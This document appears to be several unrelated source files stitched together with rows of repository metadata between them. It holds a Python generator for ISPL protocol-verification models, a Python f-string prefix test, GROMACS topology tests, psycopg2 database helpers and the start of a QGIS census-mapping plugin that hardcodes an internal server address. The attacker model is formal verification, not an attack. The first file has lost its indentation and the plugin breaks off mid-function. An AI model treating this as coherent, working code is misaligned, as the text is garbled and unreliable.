        # Trim the trailing " or\n" before closing the disjunction.
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    return evolution
def __create_network_evolution_redirect(self):
    """Emit rules letting the attacker redirect the in-flight message to any agent."""
    return "".join(
        f"\t\tmessageDestination={agent} if\n"
        "\t\t\tEnvironment.processingMessage=true and\n"
        f"\t\t\tAttacker.Action=RedirectTo{StringTools.capitalize_first_letter(agent)};\n"
        for agent in self.agents
    )
def __create_network_evolution_change_content(self):
evolution = ""
for content_key in self.keys:
evolution += f"\t\tmessageContent={content_key} if\n"
evolution += "\t\t\tEnvironment.processingMessage=true and (\n"
content_key = StringTools.capitalize_first_letter(content_key)
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
evolution += f"\t\t\tAttacker.Action=ChangeContentTo{content_key}EncryptedWith{encryption_key} or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
for encryption_key in self.keys:
evolution += f"\t\tmessageEncryption={encryption_key} if\n"
evolution += "\t\t\tEnvironment.processingMessage=true and (\n"
encryption_key = StringTools.capitalize_first_letter(encryption_key)
for content_key in self.keys:
content_key = StringTools.capitalize_first_letter(content_key)
evolution += f"\t\t\tAttacker.Action=ChangeContentTo{content_key}EncryptedWith{encryption_key} or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
return evolution
def __create_evaluation(self):
evaluation = "Evaluation\n"
evaluation += "\tkeyExchanged if Alice.bobKeyK=plain;\n"
evaluation += "\tcompromised if Attacker.aliceKeyK=plain or Attacker.bobKeyK=plain or Attacker.serverPrivateKeyK=plain;\n"
evaluation += "end Evaluation\n\n"
return evaluation
def __create_init_states(self):
init_states = "InitStates\n"
init_states += "\tEnvironment.processingMessage=false and\n"
for agent_name in self.agents:
for key_name in self.keys:
if key_name.find(agent_name) != -1 or key_name.find("PublicKey") != -1:
init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}K=plain and\n"
else:
init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}K=none and\n"
init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}EncryptionKey=none and\n"
vars = ["messageContent", "messageDestination", "messageSource", "messageEncryption"]
for var in vars:
init_states += f"\tNetwork.{var}=none and\n"
init_states += "\tNetwork.attackerDone=false and\n"
init_states += "\tNetwork.forwardAllToAttacker=true and\n"
init_states += "\tNetwork.waitForAttacker=true and\n"
init_states += "\tNetwork.forwardedToAttacker=false;\n"
init_states += "end InitStates\n\n"
return init_states
def __create_groups(self):
groups = "Groups\n"
groups += "\ttrusted={Alice, Bob, Server};\n"
groups += "\tatk={Attacker, Network};\n"
groups += "end Groups\n\n"
return groups
def __create_formulae(self):
formulae = "Formulae\n"
formulae += "\t<trusted>F keyExchanged;\n"
formulae += "\t<trusted>G !compromised;\n"
formulae += "end Formulae\n\n"
return formulae
class CompTmnProtocolIsplGenerator:
ispl_model = ""
agents = ["alice", "bob", "server", "attacker"]
no_messages = 3
no_keys = 3
min_val = 1
max_val = 100
def __init__(self):
return
def create_ispl_model(self):
self.ispl_model += self.__define_semantics()
self.ispl_model += self.__create_environment()
self.ispl_model += self.__create_alice()
self.ispl_model += self.__create_bob()
self.ispl_model += self.__create_server()
self.ispl_model += self.__create_attacker()
self.ispl_model += self.__create_evaluation()
self.ispl_model += self.__create_init_states()
self.ispl_model += self.__create_groups()
self.ispl_model += self.__create_formulae()
return self.ispl_model
def __define_semantics(self):
semantics = "Semantics=SingleAssignment;\n\n"
return semantics
def __create_environment(self):
environment = "Agent Environment\n"
environment += self.__create_environment_obsvars()
environment += self.__create_environment_vars()
environment += self.__create_environment_actions()
environment += self.__create_environment_protocol()
environment += self.__create_environment_evolution()
environment += "end Agent\n\n"
return environment
def __create_environment_obsvars(self):
obsvars = "\tObsvars:\n"
obsvars += "\tend Obsvars\n"
return obsvars
def __create_environment_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_environment_actions(self):
actions = "\tActions = {none};\n"
return actions
def __create_environment_protocol(self):
protocol = "\tProtocol:\n\t\tOther:{none};\n\tend Protocol\n"
return protocol
def __create_environment_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_alice(self):
agent = "Agent Alice\n"
agent += self.__create_alice_vars()
agent += self.__create_alice_actions()
agent += self.__create_alice_protocol()
agent += self.__create_alice_evolution()
agent += "end Agent\n\n"
return agent
def __create_alice_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_alice_vars(self):
vars = "\tVars:\n"
for message_no in range(1, self.no_messages + 1):
vars += f"\t\tmessage{message_no} : {self.min_val} .. {self.max_val};\n"
for key_no in range(1, self.no_keys + 1):
vars += f"\t\tkey{key_no} : {self.min_val} .. {self.max_val};\n"
vars += "\tend Vars\n"
return vars
def __create_alice_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_alice_protocol(self):
protocol = "\tProtocol:\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_alice_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_bob(self):
agent = "Agent Bob\n"
agent += self.__create_bob_vars()
agent += self.__create_bob_actions()
agent += self.__create_bob_protocol()
agent += self.__create_bob_evolution()
agent += "end Agent\n\n"
return agent
def __create_bob_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_bob_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_bob_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_bob_protocol(self):
protocol = "\tProtocol:\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_bob_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_server(self):
agent = "Agent Server\n"
agent += self.__create_server_vars()
agent += self.__create_server_actions()
agent += self.__create_server_protocol()
agent += self.__create_server_evolution()
agent += "end Agent\n\n"
return agent
def __create_server_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_server_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_server_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_server_protocol(self):
protocol = "\tProtocol:\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_server_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_attacker(self):
agent = "Agent Attacker\n"
agent += self.__create_attacker_vars()
agent += self.__create_attacker_actions()
agent += self.__create_attacker_protocol()
agent += self.__create_attacker_evolution()
agent += "end Agent\n\n"
return agent
def __create_attacker_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_attacker_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_attacker_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_attacker_protocol(self):
protocol = "\tProtocol:\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_attacker_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_evaluation(self):
evaluation = "Evaluation\n"
evaluation += "end Evaluation\n\n"
return evaluation
def __create_init_states(self):
init_states = "InitStates\n"
init_states += ";\nend InitStates\n\n"
return init_states
def __create_groups(self):
groups = "Groups\n"
groups += "\ttrusted={Alice, Bob, Server};\n"
groups += "\tatk={Attacker};\n"
groups += "end Groups\n\n"
return groups
def __create_formulae(self):
formulae = "Formulae\n"
formulae += "\t<trusted>F keyExchanged;\n"
formulae += "\t<trusted>G !compromised;\n"
formulae += "end Formulae\n\n"
return formulae
| 39.49306 | 336 | 0.615885 | 6,508 | 59,753 | 5.38153 | 0.028888 | 0.046512 | 0.070525 | 0.0868 | 0.888645 | 0.860235 | 0.824515 | 0.786483 | 0.771008 | 0.747337 | 0 | 0.00255 | 0.278061 | 59,753 | 1,512 | 337 | 39.51918 | 0.809333 | 0.000669 | 0 | 0.835951 | 0 | 0.032286 | 0.264038 | 0.164023 | 0.004363 | 0 | 0 | 0.000661 | 0 | 1 | 0.097731 | false | 0 | 0.000873 | 0.002618 | 0.211169 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f189a3b453afb3fca1a6c8c5078894c25c96196 | 163 | py | Python | code/datasets/segmentation/__init__.py | haasj22/Recycling_Segmentation | 0420baf4c2ac2bd18b03791e123fb4b0ad7869b1 | [
"MIT"
] | 1 | 2021-03-26T00:10:17.000Z | 2021-03-26T00:10:17.000Z | code/datasets/segmentation/__init__.py | haasj22/Recycling_Segmentation | 0420baf4c2ac2bd18b03791e123fb4b0ad7869b1 | [
"MIT"
] | null | null | null | code/datasets/segmentation/__init__.py | haasj22/Recycling_Segmentation | 0420baf4c2ac2bd18b03791e123fb4b0ad7869b1 | [
"MIT"
] | null | null | null | from IIC.code.datasets.segmentation.baselines import *
from IIC.code.datasets.segmentation.cocostuff import *
from IIC.code.datasets.segmentation.potsdam import *
| 40.75 | 54 | 0.834356 | 21 | 163 | 6.47619 | 0.428571 | 0.154412 | 0.242647 | 0.419118 | 0.772059 | 0.544118 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07362 | 163 | 3 | 55 | 54.333333 | 0.900662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f309365b4b8eba88701cd7d981facb028fcecaa | 532 | py | Python | language-python-test/test/features/strings/format_string.py | wbadart/language-python | 6c048c215ff7fe4a5d5cc36ba3c17a666af74821 | [
"BSD-3-Clause"
] | null | null | null | language-python-test/test/features/strings/format_string.py | wbadart/language-python | 6c048c215ff7fe4a5d5cc36ba3c17a666af74821 | [
"BSD-3-Clause"
] | null | null | null | language-python-test/test/features/strings/format_string.py | wbadart/language-python | 6c048c215ff7fe4a5d5cc36ba3c17a666af74821 | [
"BSD-3-Clause"
] | null | null | null | f"test 'string'"
F"test 'string'"
f'test "string"'
F'test "string"'
f'''test " 'string' "'''
F'''test " 'string' "'''
f"""test ' "string" '"""
F"""test ' "string" '"""
rf"test 'string'"
RF"test 'string'"
rf'test "string"'
RF'test "string"'
rf'''test " 'string' "'''
RF'''test " 'string' "'''
rf"""test ' "string" '"""
RF"""test ' "string" '"""
fr"test 'string'"
FR"test 'string'"
fr'test "string"'
FR'test "string"'
fr'''test " 'string' "'''
FR'''test " 'string' "'''
fr"""test ' "string" '"""
FR"""test ' "string" '"""
| 14.378378 | 25 | 0.526316 | 72 | 532 | 3.888889 | 0.069444 | 0.857143 | 0.314286 | 0.457143 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.157895 | 532 | 36 | 26 | 14.777778 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0.677966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
2f7b44f950c65837153616ce56825bed6a58ff94 | 6,255 | py | Python | tophat/test_tophat.py | Yoshanuikabundi/JupyterJoy | 658f7bb0a33fdc34eb6366fae3b73d0481fd554f | [
"MIT"
] | 2 | 2018-04-27T22:52:39.000Z | 2019-04-01T15:29:17.000Z | tophat/test_tophat.py | Yoshanuikabundi/JupyterJoy | 658f7bb0a33fdc34eb6366fae3b73d0481fd554f | [
"MIT"
] | null | null | null | tophat/test_tophat.py | Yoshanuikabundi/JupyterJoy | 658f7bb0a33fdc34eb6366fae3b73d0481fd554f | [
"MIT"
] | 1 | 2019-04-01T15:29:21.000Z | 2019-04-01T15:29:21.000Z | import pytest
from .tophat import *
def test_Topology_molecules():
strlist = [
" [ system ] ",
"; this is for gmx btw",
"Test system - microbilayer!",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
top = Topology()
top.read(strlist)
compstr = '\n'.join([
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843"
])
assert str(top.molecules) == compstr
compstr = '\n'.join([
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843",
""
])
assert str(top) == compstr
top.molecules *= 10
compstr = '\n'.join([
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 10",
"protein_with_a_very_long_name 10",
"lipid_a 20",
"lipid_b 50",
"lipid_a 20",
"lipid_b 70",
"water 128430",
""
])
assert str(top) == compstr
def test_Topology_hashcommands():
strlist = [
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
" [ system ] ",
"; this is for gmx btw",
"Test system - microbilayer!",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
top = Topology()
top.read(strlist)
assert top.includes == [
'#include "./martini_v2.2refP.itp" ; comment',
"#include './martini_protein.itp'",
"#include martini_v2.0_ions.itp"
]
assert top.defines == ["#define RUBBERBANDS"]
top.includes.append('#include martini_v2.0_sugars.itp')
compstr = '\n'.join([
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"#include martini_v2.0_sugars.itp",
"",
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843",
""
])
assert str(top) == compstr
def test_Topology_system():
strlist = [
'#include "./martini_v2.2refP.itp"; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
top = Topology()
top.read(strlist)
with pytest.raises(ValueError):
str(top)
top.name = "Test system - microbilayer!"
compstr = '\n'.join([
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"",
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843",
""
])
assert str(top) == compstr
strlist = [
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"[ system ]",
"; name",
"Test system - microbilayer! - but inconsistent name",
"",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
with pytest.raises(ValueError):
top.read(strlist)
| 29.92823 | 62 | 0.409273 | 546 | 6,255 | 4.470696 | 0.131868 | 0.114707 | 0.045883 | 0.078656 | 0.866858 | 0.855387 | 0.812782 | 0.792708 | 0.792708 | 0.792708 | 0 | 0.041469 | 0.460272 | 6,255 | 208 | 63 | 30.072115 | 0.681576 | 0 | 0 | 0.865979 | 0 | 0 | 0.565078 | 0.114487 | 0 | 0 | 0 | 0 | 0.036082 | 1 | 0.015464 | false | 0 | 0.010309 | 0 | 0.025773 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f871aad84d27e7b8dab78f5756788426b993bde | 5,622 | py | Python | psqlfunctions.py | mockinggod/Generatorbot | 502ef3b72ad841f2cd2e6ebaf8bb6655ab7c18ef | [
"MIT"
] | 7 | 2019-02-23T18:14:24.000Z | 2021-10-04T06:24:15.000Z | psqlfunctions.py | mockinggod/Generatorbot | 502ef3b72ad841f2cd2e6ebaf8bb6655ab7c18ef | [
"MIT"
] | null | null | null | psqlfunctions.py | mockinggod/Generatorbot | 502ef3b72ad841f2cd2e6ebaf8bb6655ab7c18ef | [
"MIT"
] | 2 | 2019-02-23T21:49:37.000Z | 2019-02-24T10:24:34.000Z | import psycopg2
def addprefix(serverinfo, guildid, prefix):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
postgres_insert_query = """ INSERT INTO prefixes (ID, prefix) VALUES (%s,%s)"""
record_to_insert = (guildid, prefix)
cursor.execute(postgres_insert_query, record_to_insert)
connection.commit()
count = cursor.rowcount
print (count, "Record inserted successfully into prefix table")
except (Exception, psycopg2.Error) as error :
if(connection):
print("Failed to insert record into prefix table", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def updateprefix(serverinfo, guildid, prefix):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_update_query = """Update prefixes set prefix = %s where ID = %s"""
cursor.execute(sql_update_query, (prefix, guildid))
connection.commit()
count = cursor.rowcount
print(count, "Record Updated successfully ")
except (Exception, psycopg2.Error) as error:
print("Error in update operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def readprefixes(serverinfo):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
sql_select_query = """select * from prefixes"""
cursor.execute(sql_select_query)
record = cursor.fetchall()
return(record)
except (Exception, psycopg2.Error) as error:
print("Error in update operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def removeprefix(serverinfo, guildid):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_delete_query = """Delete from prefixes where ID = %s"""
cursor.execute(sql_delete_query, (guildid, ))
connection.commit()
count = cursor.rowcount
print(count, "Record deleted successfully ")
except (Exception, psycopg2.Error) as error:
print("Error in Delete operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def addrace(serverinfo, userid, genre, race):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
postgres_insert_query = """ INSERT INTO races (ID, genre, racename, gender, weight, names, surnames, maxsettlement, occupation1, occupation2, occupation3, occupation4, occupation5, occupation6, occupation7, occupation8, occupation9, occupation10, occupation11) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"""
record_to_insert = (userid, genre, race[0], race[1], race[2], race[3], race[4], race[5], race[6][0], race[6][1], race[6][2], race[6][3], race[6][4], race[6][5], race[6][6], race[6][7], race[6][8], race[6][9], race[6][10])
cursor.execute(postgres_insert_query, record_to_insert)
connection.commit()
count = cursor.rowcount
print (count, "Record inserted successfully into races table")
except (Exception, psycopg2.Error) as error :
if(connection):
print("Failed to insert record into races table", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def readraces(serverinfo, userid, genre):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
if genre == 'all':
sql_select_query = """select * from races where ID = %s"""
record_to_select = ([userid])
else:
sql_select_query = """select * from races where ID = %s and genre = %s"""
record_to_select = (userid, genre)
cursor.execute(sql_select_query, record_to_select)
record = cursor.fetchall()
count = cursor.rowcount
return(count, record)
except (Exception, psycopg2.Error) as error:
print("Error in update operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def removerace(serverinfo, userid, genre, racename):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_delete_query = """Delete from races where ID = %s and genre = %s and racename = %s"""
cursor.execute(sql_delete_query, (userid, genre, racename))
count = cursor.rowcount
connection.commit()
print(count, "Record deleted successfully ")
return(count)
except (Exception, psycopg2.Error) as error:
print("Error in Delete operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def removeracegenre(serverinfo, userid, genre):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_delete_query = """Delete from races where ID = %s and genre = %s"""
cursor.execute(sql_delete_query, (userid, genre))
connection.commit()
count = cursor.rowcount
print(count, "Record deleted successfully ")
return(count)
except (Exception, psycopg2.Error) as error:
print("Error in Delete operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed") | 27.694581 | 331 | 0.710423 | 686 | 5,622 | 5.752187 | 0.144315 | 0.00963 | 0.012924 | 0.016219 | 0.806893 | 0.783071 | 0.751394 | 0.751394 | 0.714394 | 0.679169 | 0 | 0.012561 | 0.164532 | 5,622 | 203 | 332 | 27.694581 | 0.82755 | 0.058698 | 0 | 0.733813 | 0 | 0.007194 | 0.250899 | 0.010983 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057554 | false | 0 | 0.007194 | 0 | 0.064748 | 0.158273 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
85ed5758af7052c5fd4b8ccd5d18aa439218651b | 36,860 | py | Python | censo_segmento.py | manureta/salidagrafica-atlas | 200f1028e1c0293cbd3ac636ddc1c203e9478abc | [
"MIT"
] | null | null | null | censo_segmento.py | manureta/salidagrafica-atlas | 200f1028e1c0293cbd3ac636ddc1c203e9478abc | [
"MIT"
] | null | null | null | censo_segmento.py | manureta/salidagrafica-atlas | 200f1028e1c0293cbd3ac636ddc1c203e9478abc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
/***************************************************************************
CensoSegmento
A QGIS plugin
Censo Segmento
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2020-09-15
git sha : $Format:%H$
copyright : (C) 2020 by Maximiliano Monti
email : renzomiguelmonti@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt5.QtCore import QSettings, QTranslator, qVersion, QVersionNumber, QCoreApplication, Qt, QObject, pyqtSignal
from qgis.PyQt.QtGui import QIcon
from PyQt5.QtWidgets import QAction, QDialog, QFormLayout, QInputDialog , QLineEdit , QMessageBox
from qgis.PyQt.QtXml import QDomDocument
from qgis.utils import iface
from qgis.core import *
# Initialize Qt resources from file resources.py
from .resources import *
# Import the code for the dialog
from .censo_segmento_dialog import CensoSegmentoDialog
import os
import sys
class CensoSegmento:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value('locale/userLocale')[0:2]
locale_path = os.path.join(
self.plugin_dir,
'i18n',
'CensoSegmento_{}.qm'.format(locale))
if os.path.exists(locale_path):
self.translator = QTranslator()
self.translator.load(locale_path)
QCoreApplication.installTranslator(self.translator)
# Declare instance attributes
self.actions = []
self.menu = self.tr(u'&INDEC - CNPHyV')
# Check if plugin was started the first time in current QGIS session
# Must be set in initGui() to survive plugin reloads
self.first_start = None
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
return QCoreApplication.translate('CensoSegmento', message)
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip='Por aca puede ir la cosa',
whats_this='Que es esto',
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
# Adds plugin icon to Plugins toolbar
self.iface.addToolBarIcon(action)
if add_to_menu:
self.iface.addPluginToMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = ':/plugins/censo_segmento/icon.png'
current_dir = os.path.dirname(os.path.realpath(__file__))
poll_icon_path = os.path.join(current_dir,'icons/poll.png')
self.add_action(
poll_icon_path,
text=self.tr(u'Menu Principal'),
callback=self.run,
parent=self.iface.mainWindow())
self.add_action(
poll_icon_path,
add_to_toolbar=False,
text=self.tr(u'Plano de Fracción'),
callback=self.runFraccion,
parent=self.iface.mainWindow())
self.add_action(
poll_icon_path,
add_to_toolbar=False,
text=self.tr(u'Plano de Radio'),
callback=self.runRadio,
parent=self.iface.mainWindow())
self.add_action(
poll_icon_path,
add_to_toolbar=False,
text=self.tr(u'Plano de Segmento'),
callback=self.runSegmento,
parent=self.iface.mainWindow())
# will be set False in run()
self.first_start = True
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
for action in self.actions:
self.iface.removePluginMenu(
self.tr(u'&Censo Segmento'),
action)
self.iface.removeToolBarIcon(action)
def run(self):
"""Run method that performs all the real work"""
# Create the dialog with elements (after translation) and keep reference
# Only create GUI ONCE in callback, so that it will only load when the plugin is started
if self.first_start == True:
self.first_start = False
self.dlg = CensoSegmentoDialog()
# Events
self.dlg.buttonFraccion.clicked.connect(self.runFraccion)
self.dlg.buttonRadio.clicked.connect(self.runRadio)
self.dlg.buttonSegmento.clicked.connect(self.runSegmento)
# show the dialog
self.dlg.show()
def runRadio(self, iface):
from qgis.utils import iface
#####################################Conexion existente en el admnistrador de BD##############################################
##########Conexion desde BD a Postgis
QgsProject.instance().clear()
qs = QSettings()
dbHost = qs.value("PostgreSQL/connections/informatica/host",'10.70.80.62')
dbPort = qs.value("PostgreSQL/connections/informatica/port",'5432')
dbName = qs.value("PostgreSQL/connections/informatica/database",'DEVSEG')
############Pedir al usuario cargar los campos de usuario y contraseña
dbUsr = QInputDialog.getText(None, 'usuario', 'Introduce el nombre de usuario de la base de datos')
dbPwd = QInputDialog.getText(None, 'contraseña', 'Introduce la contraseña', QLineEdit.Password)
#####################################Conexion PostGIS##############################################
# introducimos nombre del servidor, puerto, nombre de la base de datos, usuario y contraseña
uri = QgsDataSourceUri()
uri.setConnection(dbHost,dbPort,dbName,dbUsr[0],dbPwd[0])
##############################Verificar Usuuario y Contraseña##########################################
# origen = QInputDialog.getText(None, 'origen', 'Introduce la ruta de acceso')
